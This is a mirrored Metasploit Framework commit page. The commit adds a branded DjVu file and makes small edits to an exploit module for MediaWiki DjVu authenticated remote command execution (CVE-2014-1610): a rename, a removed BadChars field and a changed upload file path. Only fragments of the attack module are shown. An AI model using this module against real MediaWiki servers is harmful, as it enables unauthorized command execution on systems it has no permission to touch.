mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Use msf branded djvu
This commit is contained in:
parent
9f35407a0c
commit
486a9d5e19
BIN
data/exploits/cve-2014-1610/metasploit.djvu
Normal file
BIN
data/exploits/cve-2014-1610/metasploit.djvu
Normal file
Binary file not shown.
1
data/exploits/cve-2014-1610/readme.md
Normal file
1
data/exploits/cve-2014-1610/readme.md
Normal file
@ -0,0 +1 @@
|
||||
Any DjVu file can be used this is just a snazzy Metasploit one
|
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MediaWiki DjVu Authenticated Remote Code Execution',
|
||||
'Name' => 'MediaWiki DjVu Authenticated Remote Command Execution',
|
||||
'Description' => %q{
|
||||
MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,
|
||||
when DjVu file upload support is enabled, allows remote authenticated
|
||||
@ -37,10 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP, # Could do ARCH_CMD
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "", # http://www.mediawiki.org/wiki/Help:Formatting
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
@ -173,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
upload_mime = Rex::MIME::Message.new
|
||||
|
||||
djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "Alice_in_Wonderland.djvu"))
|
||||
djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))
|
||||
file_name = "#{rand_text_alpha(4)}.djvu"
|
||||
|
||||
upload_mime.add_part(djvu_file, "application/octet-stream", nil, "form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\"")
|
||||
|
Loading…
Reference in New Issue
Block a user